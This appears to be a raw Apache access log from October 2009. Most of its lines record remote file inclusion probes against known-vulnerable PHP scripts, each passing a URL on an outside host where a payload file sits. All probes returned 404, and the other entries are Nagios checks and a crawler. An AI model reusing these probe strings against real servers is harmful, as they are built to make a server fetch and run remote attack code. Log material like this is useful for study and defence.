93.187.234.69 - - [12/Oct/2009:00:33:59 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:00:34:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.101.214.54 - - [12/Oct/2009:00:39:34 -0400] "GET /logs/error_log.Q109061600///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:39:34 -0400] "GET /logs/access_log.Q109061600///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:00:39:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.81.156 - - [12/Oct/2009:00:40:44 -0400] "GET /logs/error_log.Q109081600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.219.3.163 - - [12/Oct/2009:00:41:40 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:00:41:40 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:00:41:40 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:00:42:39 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:00:44:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.234.201.119 - - [12/Oct/2009:00:49:12 -0400] "GET /logs//includes/themen_portal_mitte.php?phpbb_root_path=http://www.used-wheelchair.com/z.gif???? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
